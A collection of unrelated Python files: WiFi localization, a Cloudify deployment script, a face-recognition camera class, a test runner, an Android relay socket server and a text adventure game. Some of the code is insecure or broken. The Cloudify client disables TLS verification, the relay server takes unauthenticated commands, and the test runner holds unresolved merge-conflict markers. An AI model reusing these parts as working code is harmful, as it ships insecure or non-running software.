fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
max_x = 0
max_y = 0
for mac in fingerprint:
if len(fingerprint[mac]) > max_x:
max_x = len(fingerprint[mac])
for x in range(len(fingerprint[mac])):
if len(fingerprint[mac][x]) > max_y:
max_y = len(fingerprint[mac][x])
while 1:
compare = {}
packets = sca.sniff(iface=iface, timeout=1)
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
compare_avg = {}
for mac in compare:
l = compare[mac]
avg = n.mean(l)
#avg = trimmean(l, 80)
compare_avg.update({mac:avg})
guess = []
weight = []
difference = [[None]*max_y for _ in range(max_x)]
for mac in compare_avg:
least = None
location = []
if mac in fingerprint:
for x in range(len(fingerprint[mac])):
for y in range(len(fingerprint[mac][x])):
if fingerprint[mac][x][y] != None:
c = abs(fingerprint[mac][x][y] - compare_avg[mac])
if difference[x][y] != None:
difference[x][y] += c
else:
difference[x][y] = c
final_x = 0
final_y = 0
print difference
for x in range(len(difference)):
for y in range(len(difference[x])):
if(difference[final_x][final_y] is None and difference[x][y] is not None):
final_x = x
final_y = y
if(difference[final_x][final_y] > difference[x][y]):
final_x = x
final_y = y
print(final_x, final_y)
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Apache/tosca.interfaces.node.lifecycle.Standard/start/start_apache.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['apache_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80' + r'/'
ctx.instance.update()
|
terminal.py
|
# from KF.server_kalman_filter import Stack, Track
import numpy as np
# import dlib
import os, sys
import argparse
import requests
from multiprocessing import Process, Queue
import time
# Cloud Server
URL = 'http://yaolaoban.eva0.nics.cc:5000/detect'
# global varibles
# this_file_path = os.path.dirname(os.path.abspath(__file__))
# imdb_name = 'Jumping'
# imdb_path = os.path.join(this_file_path, 'img', imdb_name)
# _, _, files = os.walk(imdb_path).next()
# img_count = len(files) - 1
i = 1
# Status varibles
updated = False
def postIMG():
global i, updated
f = open(imdb_path+'/%04d.jpg'%i)
r = requests.post(url=URL, files={'img':f})
updtbox = r.json()['bbox']
updated = True
f.close()
def realtime_simulation(queue):
while queue.get() < 100:
queue.put(queue.get() + 1)
print 'New Frame', i
time.sleep(0.04)
if __name__ == '__main__':
q = Queue()
q.put(1)
print q.get()
q.put(2)
print q.get()
# p = Process(target=realtime_simulation, args=[q])
# p.start()
# print 'Started'
# p.join()
# print 'Joined'
|
Camera.py
|
# Camera Class
# Brandon Joffe
# 2016
#
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import numpy as np
import cv2
import ImageUtils
import dlib
import openface
import os
import argparse
import logging
import SurveillanceSystem
import MotionDetector
import FaceDetector
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
fileDir = os.path.dirname(os.path.realpath(__file__))
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--networkModel', type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int,
help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
args = parser.parse_args()
CAPTURE_HZ = 30.0 # Determines frame rate at which frames are captured from IP camera
class IPCamera(object):
"""The IPCamera object continually captures frames
from a camera and makes these frames available for
proccessing and streamimg to the web client. A
IPCamera can be processed using 5 different processing
functions detect_motion, detect_recognise,
motion_detect_recognise, segment_detect_recognise,
detect_recognise_track. These can be found in the
SureveillanceSystem object, within the process_frame function"""
def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak):
os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;0"
logger.debug("Loading Stream From IP Camera: " + camURL)
self.motionDetector = MotionDetector.MotionDetector()
self.faceDetector = FaceDetector.FaceDetector()
self.processing_frame = None
self.tempFrame = None
self.captureFrame = None
self.streamingFPS = 0 # Streaming frame rate per second
self.processingFPS = 0
self.FPSstart = time.time()
self.FPScount = 0
self.motion = False # Used for alerts and transistion between system states i.e from motion detection to face detection
self.people = {} # Holds person ID and corresponding person object
self.trackers = [] # Holds all alive trackers
self.cameraFunction = cameraFunction
self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False)
self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras
self.rgbFrame = None
self.faceBoxes = None
self.captureEvent = threading.Event()
self.captureEvent.set()
self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary
print("prepare VideoCapture------------------------")
self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera
#self.video.get()
print("video = cv2.VideoCapture------------------------")
logger.info("We are opening the video feed.")
self.videoError = False
self.url = camURL
if not self.video.isOpened():
print("not self.video.isOpened():-----------------------")
self.video.open()
print("Video feed opened------------------------")
logger.info("Video feed open.")
self.dump_video_info() # logging every specs of the video feed
# Start a thread to continuously capture frames.
# The capture thread ensures the frames being processed are up to date and are not old
self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access
self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame)
self.captureThread.daemon = True
self.captureThread.start()
self.captureThread.stop = False
def __del__(self):
self.video.release()
def get_frame(self):
print("camera.get_frame_start")
logger.debug('Getting Frames')
FPScount = 0
warmup = 0
#fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to
FPSstart = time.time()
while True:
success, frame = self.video.read()
self.captureEvent.clear()
if success:
self.captureFrame = frame
self.captureEvent.set()
FPScount += 1
if FPScount == 5:
self.streamingFPS = 5/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
if self.fpsTweak:
if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up
if self.streamingFPS > CAPTURE_HZ:
time.sleep(1/CAPTURE_HZ)
else:
time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ))
def read_jpg(self):
"""We are using Motion JPEG, and OpenCV captures raw images,
so we must encode it into JPEG in order to stream frames to
the client. It is nessacery to make the image smaller to
improve streaming performance"""
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def read_frame(self):
capture_blocker = self.captureEvent.wait()
frame = self.captureFrame
return frame
def read_processed(self):
frame = None
with self.captureLock:
frame = self.processing_frame
while frame is None: # If there are problems, keep retrying until an image can be read.
with self.captureLock:
frame = self.processing_frame
frame = ImageUtils.resize_mjpeg(frame)
ret, jpeg = cv2.imencode('.jpg', frame)
return jpeg.tostring()
def dump_video_info(self):
logger.info("---------Dumping video feed info---------------------")
logger.info("Position of the video file in milliseconds or video capture timestamp: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_MSEC))
logger.info("0-based index of the frame to be decoded/captured next: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_FRAMES))
logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ")
logger.info(self.video.get(cv2.CAP_PROP_POS_AVI_RATIO))
logger.info("Width of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
logger.info("Height of the frames in the video stream: ")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
logger.info("Frame rate:")
logger.info(self.video.get(cv2.CAP_PROP_FPS))
logger.info("4-character code of codec.")
logger.info(self.video.get(cv2.CAP_PROP_FOURCC))
logger.info("Number of frames in the video file.")
logger.info(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
logger.info("Format of the Mat objects returned by retrieve() .")
logger.info(self.video.get(cv2.CAP_PROP_FORMAT))
logger.info("Backend-specific value indicating the current capture mode.")
logger.info(self.video.get(cv2.CAP_PROP_MODE))
logger.info("Brightness of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_BRIGHTNESS))
logger.info("Contrast of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_CONTRAST))
logger.info("Saturation of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_SATURATION))
logger.info("Hue of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_HUE))
logger.info("Gain of the image (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_GAIN))
logger.info("Exposure (only for cameras).")
logger.info(self.video.get(cv2.CAP_PROP_EXPOSURE))
logger.info("Boolean flags indicating whether images should be converted to RGB.")
logger.info(self.video.get(cv2.CAP_PROP_CONVERT_RGB))
logger.info("--------------------------End of video feed info---------------------")
|
run_integration_tests.py
|
from multiprocessing import Process, Manager, Queue
import time
import snekpro.api as api
from snekpro.integration_tests.mock_tag_pro_env import MockTagProExtMutliAgentEnv
def main():
print("Starting snekpro")
manager = Manager()
game_states = manager.list()
keypresses = Queue()
config = {"game_states": game_states, "keypresses": keypresses}
<<<<<<< HEAD
mock_tag_pro_env = MockTagProExtMutliAgentEnv(
{
"game_states": game_states,
"keypresses": keypresses,
}
)
=======
mock_tag_pro_env = MockTagProExtMutliAgentEnv(config)
>>>>>>> 9a5f801e5f0b26621c7656f8a03f9abdd93182c3
api_process = Process(target=api.run, args=(game_states, keypresses))
env_process = Process(target=mock_tag_pro_env.run)
print("Starting API")
api_process.start()
time.sleep(5)
print("Starting agent")
env_process.start()
try:
time.sleep(60)
except KeyboardInterrupt:
print("Caught KeyboardInterrupt, terminating processes")
api_process.terminate()
api_process.join()
env_process.terminate()
env_process.join()
else:
print("Timeout, terminating processes")
api_process.terminate()
api_process.join()
env_process.terminate()
env_process.join()
if __name__ == "__main__":
main()
|
androidServer.py
|
import socket
import sys
import threading
class Server:
def __init__(self, port, relay):
self.port = port
self.running = False
self.thread = threading.Thread(target = self.__startServer)
self.thread.setDaemon(True) # dies with main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', port))
self.relay = relay
def __startServer(self):
self.sock.listen(1)
while self.running:
conn, addr = self.sock.accept()
print "connected to ", addr
isConnected = True
while(isConnected):
try:
buf = conn.recv(8)
if ord(buf[0]) == 1:
self.relay.switch()
except(socket.error, IndexError):
isConnected = False
print "disconnected from ", addr
if(isConnected):
conn.close()
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
|
game.py
|
# Hello, this is the main file
from advent import *
import time
import os
import __future__
import sys
import threading
game = Game()
def end(self, actor, noun, words):
print "\n\n\nWell done! \nYou completed the Libary Escape Game!\n\n\n"
time.sleep(2)
print """|@@@@| |####|
|@@@@| |####|
|@@@@| |####|
\@@@@| |####/
\@@@| |###/
`@@|_____|##'
(O)
.-'''''-.
.' * * * `.
: * * :
: ~ Libary ~ :
: ~ Escape ~ :
: * * :
`. * * * .'
`-.....-'\n\n\n"""
print "By James, Owen and Matthew"
def countdown():
floor3Key = corridoor.new_object("key", "Key to Floor 3")
floor3.make_requirement(floor3Key)
print("A key to the main floor 3 is now available. Use \"take key\"")
n = 30
while n > 0:
time.sleep(1)
n = n -1
if n == 0:
print("""You died!
.#@#';'+@@;
@; ```` ```` :@`
@,```````````````,@
@ ```````````````` @
`@ ````````````````````@
@ ````````````````````` @
::` ```````````````````` ;,
@`````````````````````````@
,+```````````````````````:`#`
@``.`````````````````````;`.#
@ ;`````````````````````+` @
@``.`````````````````````;``@
@`: ````````````````````. `@
@`@````` ````````````````,`.@
@ ,``` ` ` ```````````` @ '@
@``@.`` '+```` ` .:'+@ #'@`@
@ `@@` ,;;:+# ``@:` ``.`+ @
@, ' ` `.'. `#`` ;,+##'``';,@
##,``#@@@@@@, `#@@@@@@@:`+##
.@@`'@@@@@@@@ ``@@@@@@@@@ #@,
@@.@@@@@ .@@```@@@@@ +@@ @@
@@:+@@@@'#@@ `@@@@@@@@# @@@
.@@.:@@@@@@@'`@` @@@@@@#+`:+@
,@.,`'+@@@+:`:@@ ;+++'+ ` @
,@;`` :''.#``@@@;`` ,:``,@
`@# ``.`````@+@@ ``.;'` ` @
,@ ,. ``.``:@#@@ ;`` , @
.@@;+'````+@#@@ ```@+@@`
@'@@@``` `'`..`````@`#@
@,'@@ ` ` `` `.`+@ @@
@..@@#,`.., ` .'@@`.@
@.`@@;'@#+#'';#,.:@@`:@
@`;;@#@ ,;; .:`#@@@`;#
@`+`'+,#@#+,#+@@+.@+`++
@.:`@`#; `;'#'.+, ` #'
++#` `.`'#`,:#+,` ,``@.
@@ ```` `.,, `` @
:@ `` ```` ``` `` @;
'@ : ``````` +` @+
+@ `` ````` `.@;
@@ `````` #`.@:
@@`@` ``# ;@.
;@@@@@@@@@`
````
""")
os.execl(sys.executable, sys.executable, * sys.argv)
def start(self, actor, noun, words):
countdown_thread = threading.Thread(target=countdown)
countdown_thread.start()
def listen(self, actor, noun, words):
print " The lion asks: What is the worst vegetable to have on a ship?"
print "Enter answer"
global input
input = raw_input()
if "leek" in input.lower():
print "You Win. The frog drops a key. You can use \"take key\" to collect it."
side4key = side4.new_object("key", "Key to the Elevator")
corridoor.make_requirement(side4key)
elif "leak" in input.lower():
print "You Win. The frog drops a key. You can use \"take key\" to collect it."
side4key = side4.new_object("key", "Key to the Elevator")
corridoor.make_requirement(side4key)
else:
print "Try Again"
listen(0,0,0,0)
floor5 = game.new_location(
"Floor 5",
"""
__ _ __ ______
/ / (_) /_ _________ ________ __ / ____/_____________ _____ ___
/ / / / __ \/ ___/ __ `/ ___/ / / / / __/ / ___/ ___/ __ `/ __ \/ _ \
/ /___/ / /_/ / / / /_/ / / / /_/ / / /___(__ ) /__/ /_/ / /_/ / __/
/_____/_/_.___/_/ \__,_/_/ \__, / /_____/____/\___/\__,_/ .___/\___(_)
/____/ /_/
You are on floor five of a large library.
The place is deserted.
You cannot see the room.
Your laptop is on the floor below.
Commands - down
"""
)
floor4 = game.new_location(
"Floor 4",
"""
As soon as you reach the bottom of the stairs, a laptop on a table explodes into a sea of flames. There is a wooden door to the west. There is a staircase to floor 3, but it is locked. You don't have long before the fire spreads.
Commands - west
"""
)
side4 = game.new_location(
"Side Room",
"""
You are in a small side room, a lion is standing in its center.
Commands - listen, east
"""
)
corridoor = game.new_location(
"Corridoor",
"""
You have reached a corridoor at the bottom of the stairs. The room ahead is very hot and you can't survive in there for very long. Type start then get the key then advance to the next room.
Commands - start then west
"""
)
floor3 = game.new_location(
"TOP MIDDLE MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
, @@@@@@@@@@@@@; '
,,,,,,,,,,,,,,+@@@@@@@@@@@@',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
You are in the first room of a large maze.
"""
)
tlmaze = game.new_location(
"TOP LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@;:,,,,,,,,,,,.',,,,,,,,,,,.+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
trmaze = game.new_location(
"TOP RIGHT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
, , @@@@@@@@@@@@@'
,,,,,,,,,,,,,,:,,,,,,,,,,,.@@@@@@@@@@@@@+
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,`````````````,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
mlmaze = game.new_location(
"MIDDLE LEFT MAZE ROOM",
"""
`,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,,,,,,,,,,,,,,:,,,,,,,,,,,.',,,,,,,,,,,.+
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@, ; '
,@@@@@@@@@@@@@,````````````;````````````'
,`````````````,````````````;````````````'
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
, , ; '
,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
"""
)
mmmaze = game.new_location(
"MIDDLE MIDDLE MAZE ROOM",
"""
:
: ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
: , ' # @
